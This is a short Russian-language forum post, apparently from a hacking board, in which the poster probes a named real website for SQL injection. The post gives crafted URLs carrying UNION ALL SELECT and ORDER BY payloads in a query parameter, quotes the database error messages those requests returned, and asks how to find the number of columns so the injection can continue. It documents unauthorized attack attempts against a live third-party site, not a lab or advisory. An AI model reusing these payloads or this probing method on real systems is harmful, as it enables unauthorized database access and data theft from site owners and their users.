12.04.2010, 23:31
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
С нами:
9315345
Репутация:
53
|
|
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
PHP код:
Ошибка запроса: 'select name,parentid from kn_tree where id=1 union all select 1'
а если запрос изменить на:
http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1, 2
то ошибка уже
PHP код:
Ошибка запроса: 'select typeid from kn_tree where id=1 union all select 1,2'
что это значит? и как подобрать количество полей.?
кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая... |
|
|